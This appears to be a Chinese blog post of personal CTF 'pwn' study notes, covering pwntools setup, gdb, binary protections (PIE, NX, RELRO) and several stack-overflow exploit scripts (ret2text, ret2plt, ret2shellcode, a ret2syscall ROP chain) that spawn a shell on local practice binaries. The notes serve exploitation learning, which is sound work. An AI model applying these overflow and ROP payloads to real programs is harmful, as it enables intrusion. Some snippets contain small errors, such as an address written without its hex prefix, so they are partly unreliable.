0
点赞
收藏
分享

微信扫一扫

PWN-学习笔记

生活记录馆 2022-07-12 阅读 49


原理

危险函数:gets scanf
pwndbg

Python2 安装

pip install pwntools

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev3

ni 单步
si 子函数

PWN-学习笔记_python


libc_database

例子

pwntools getshell

from pwn import *
sh = process('./level0')

# 调用system地址
callsystem = 0x400596

# p64 小端序 96 05 40 00 00 00 00 00
# 用a填满0x80长度的栈,然后把ebs替换,并附上callsystem地址
payload = 'a'*0x80 + 'b'*8 + p64(callsystem)

# 断点
# gdb.attach(sh)

sh.send(payload)

# 交互
sh.interactive()

# 查看内存数据 5个字节
# x/5bx 0x400596
# 继续执行
# cn

PWN-学习笔记_python_02

# 检查安全保护
checksec level0

# 查看是否开启
cat /proc/sys/kernel/randomize_va_space

保护

查看保护属性

PWN-学习笔记_git_03

PWN-学习笔记_数据_04


PWN-学习笔记_python_05

PIE

PWN-学习笔记_git_06


PWN-学习笔记_git_07

NX

PWN-学习笔记_python_08


PWN-学习笔记_python_09

PWN-学习笔记_数据_10

RELPRO

PWN-学习笔记_git_11


PWN-学习笔记_数据_12


PWN-学习笔记_git_13

Partical RELRO

PWN-学习笔记_python_14

Full

PWN-学习笔记_python_15

PWN-学习笔记_python_16

ret2text

PWN-学习笔记_git_17


PWN-学习笔记_数据_18

from pwn import *
sh = process('./ret2text')
backdoor= 0804846D
payload = 'a'*0x28 + 'b'*4 + p32(backdoor)
sh.send(payload)
sh.interactive()

level2

PWN-学习笔记_数据_19

用到plt表

from pwn import *

sh = process('./level2')

system_plt = 0x8048320
bin_sh = 0x804a024

# 填充满堆栈buf:ebs指向的栈大小 + ebs占4个字节
payload = 'a'*0x88 + 'b'*4

# 调用返回地址 + 参数(用不到,随便写个0) + 参数
payload += p32(system_plt) + p32(0) + p32(bin_sh)

#gdb.attach(sh)

sh.send(payload)

sh.interactive()

ret2shellcode

PWN-学习笔记_python_20

level1

PWN-学习笔记_git_21

from pwn import *

sh = process('./level1')

sh.recvuntil('What\'s this:0x')
buf_addr = sh.recvuntil('?', drop=True)
buf_addr = int(buf_addr, 16)

shellcode = asm(shellcraft.sh())

# 用shellcode填充前0x88个字节,不满的填充a, ebs占4个字节,后面时调用地址
payload = shellcode.ljust(0x88, 'a') + 'b'*4 + p32(buf_addr)

sh.send(payload)
sh.interactive()

ret2syscall

ROP

PWN-学习笔记_数据_22


PWN-学习笔记_git_23


PWN-学习笔记_数据_24

控制三次返回地址

from pwn import *

elf = ELF('./ret2syscall')
sh = process('./ret2syscall')

pop_eax_ret = 0x080b8316
pop3_ret = 0x0806edd0
int_0x80 = 0x0806ca25
bin_sh = elf.search('/bin/sh\x00').next()

#execve("/bin/sh", 0, 0)
payload = 'a'*0x28 + 'b'*4
payload += p32(pop_eax_ret) + p32(0xb)
payload += p32(pop3_ret) + p32(0) + p32(0) + p32(bin_sh)
payload += p32(int_0x80)

sh.send(payload)
sh.interactive()

堆内存

PWN-学习笔记_python_25


PWN-学习笔记_数据_26

PWN-学习笔记_git_27

PWN-学习笔记_git_28

PWN-学习笔记_git_29

相关资料

​​https://wiki.x10sec.org/​​


举报

相关推荐

PWN-整数溢出

BUUCTF|PWN-[OGeek2019]babyrop1-WP

pwn学习笔记(11)--off_by_one

PWN做题笔记7-CGfsb

PWN做题笔记4-guess_num

CGfsb pwn

0 条评论